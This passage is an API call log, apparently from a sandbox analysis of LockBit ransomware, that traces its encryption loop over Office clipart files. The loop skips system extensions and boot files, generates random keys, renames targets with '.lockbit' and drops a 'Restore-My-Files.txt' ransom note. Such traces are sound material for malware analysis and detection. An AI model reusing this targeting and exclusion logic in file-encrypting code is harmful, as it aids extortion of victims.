BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0106.328] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.328] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.329] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0106.329] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.333] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.336] malloc (_Size=0xa6) returned 0x77d800 [0106.336] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0106.336] free (_Block=0x77d800) [0106.336] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0106.336] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0106.336] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0106.337] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x38cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD09194_.WMF", cAlternateFileName="")) returned 1 [0106.337] lstrcmpiW (lpString1=".", lpString2="BD09194_.WMF") returned -1 [0106.337] lstrcmpiW (lpString1="..", lpString2="BD09194_.WMF") returned -1 [0106.337] PathFindExtensionW (pszPath="BD09194_.WMF") returned=".WMF" [0106.337] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0106.337] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0106.337] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0106.337] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0106.337] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0106.337] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0106.337] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0106.337] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0106.337] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0106.337] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0106.337] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0106.337] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0106.337] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0106.337] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0106.337] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0106.337] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0106.337] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0106.337] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0106.337] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0106.337] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0106.337] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0106.337] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0106.337] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0106.338] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0106.338] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.338] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0106.338] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0106.338] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0106.338] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0106.338] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0106.338] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0106.338] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0106.338] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0106.338] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0106.338] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0106.338] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0106.338] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0106.338] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0106.338] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0106.338] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0106.338] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0106.338] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0106.338] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.338] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0106.338] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0106.338] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0106.338] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0106.338] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD09194_.WMF") returned 1 [0106.338] lstrcmpiW (lpString1="ntldr", lpString2="BD09194_.WMF") returned 1 [0106.338] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD09194_.WMF") returned 1 [0106.338] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD09194_.WMF") returned 1 [0106.339] lstrcmpiW (lpString1="autorun.inf", lpString2="BD09194_.WMF") returned -1 [0106.339] lstrcmpiW (lpString1="thumbs.db", lpString2="BD09194_.WMF") returned 1 [0106.339] lstrcmpiW (lpString1="iconcache.db", lpString2="BD09194_.WMF") returned 1 [0106.339] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0106.339] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned=".WMF" [0106.339] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0106.339] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0106.339] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0106.339] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0106.339] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0106.339] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0106.339] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0106.339] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0106.339] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0106.339] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0106.339] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0106.339] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0106.339] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0106.339] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0106.339] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0106.339] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0106.339] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0106.339] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0106.339] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0106.339] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0106.339] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0106.339] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0106.340] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0106.340] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0106.340] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0106.340] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0106.340] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0106.340] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0106.340] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF.lockbit") returned 72 [0106.340] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09194_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0106.340] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0106.341] malloc (_Size=0x40068) returned 0x1ff1e60 [0106.341] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=14540) returned 1 [0106.341] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.341] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0106.341] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.342] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0106.342] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.347] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.347] malloc (_Size=0xa6) returned 0x77d800 [0106.347] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0106.350] free (_Block=0x77d800) [0106.350] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0106.350] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0106.350] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0106.350] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x504a, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD09662_.WMF", cAlternateFileName="")) returned 1 [0106.350] lstrcmpiW (lpString1=".", lpString2="BD09662_.WMF") returned -1 [0106.350] lstrcmpiW (lpString1="..", lpString2="BD09662_.WMF") returned -1 [0106.350] PathFindExtensionW (pszPath="BD09662_.WMF") returned=".WMF" [0106.350] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0106.350] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0106.350] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0106.350] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0106.350] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0106.350] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0106.350] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0106.350] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0106.351] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0106.351] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0106.351] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0106.351] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0106.351] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0106.351] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0106.351] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0106.351] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0106.351] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0106.351] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0106.351] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0106.351] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0106.351] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0106.351] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0106.351] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0106.351] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0106.353] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.353] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0106.353] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0106.353] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0106.353] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0106.353] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0106.353] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0106.353] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0106.353] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0106.353] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0106.353] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0106.353] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0106.353] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0106.354] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0106.354] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0106.354] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0106.354] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0106.354] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0106.354] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.354] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0106.354] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0106.354] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0106.354] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0106.354] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD09662_.WMF") returned 1 [0106.354] lstrcmpiW (lpString1="ntldr", lpString2="BD09662_.WMF") returned 1 [0106.354] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD09662_.WMF") returned 1 [0106.354] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD09662_.WMF") returned 1 [0106.354] lstrcmpiW (lpString1="autorun.inf", lpString2="BD09662_.WMF") returned -1 [0106.354] lstrcmpiW (lpString1="thumbs.db", lpString2="BD09662_.WMF") returned 1 [0106.354] lstrcmpiW (lpString1="iconcache.db", lpString2="BD09662_.WMF") returned 1 [0106.354] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0106.354] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned=".WMF" [0106.354] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0106.354] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0106.354] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0106.354] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0106.354] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0106.354] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0106.354] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0106.355] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0106.355] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0106.355] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0106.355] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0106.355] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0106.355] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0106.355] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0106.355] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0106.355] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0106.355] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0106.355] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0106.355] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0106.355] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0106.355] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0106.355] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0106.355] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0106.355] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0106.355] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0106.355] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0106.355] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0106.355] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0106.355] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF.lockbit") returned 72 [0106.355] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09662_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0106.357] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0106.357] malloc (_Size=0x40068) returned 0x1ff1e60 [0106.357] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=20554) returned 1 [0106.357] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.358] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.358] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0106.358] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.358] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.358] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0106.358] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.365] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.365] malloc (_Size=0xa6) returned 0x77d800 [0106.365] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0106.369] free (_Block=0x77d800) [0106.369] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0106.369] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0106.369] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0106.369] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1f1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD09664_.WMF", cAlternateFileName="")) returned 1 [0106.369] lstrcmpiW (lpString1=".", lpString2="BD09664_.WMF") returned -1 [0106.369] lstrcmpiW (lpString1="..", lpString2="BD09664_.WMF") returned -1 [0106.369] PathFindExtensionW (pszPath="BD09664_.WMF") returned=".WMF" [0106.369] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0106.369] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0106.369] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0106.369] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0106.369] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0106.369] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0106.370] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0106.370] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0106.370] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0106.370] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0106.370] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0106.370] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0106.370] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0106.370] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0106.370] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0106.370] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0106.370] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0106.370] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0106.370] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0106.370] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0106.370] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0106.370] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0106.370] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0106.370] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0106.370] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.370] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0106.370] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0106.370] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0106.370] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0106.370] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0106.370] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0106.370] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0106.370] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0106.370] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0106.370] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0106.370] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0106.370] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0106.370] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0106.371] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0106.371] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0106.371] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0106.371] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0106.371] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.371] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0106.371] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0106.371] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0106.371] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0106.371] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD09664_.WMF") 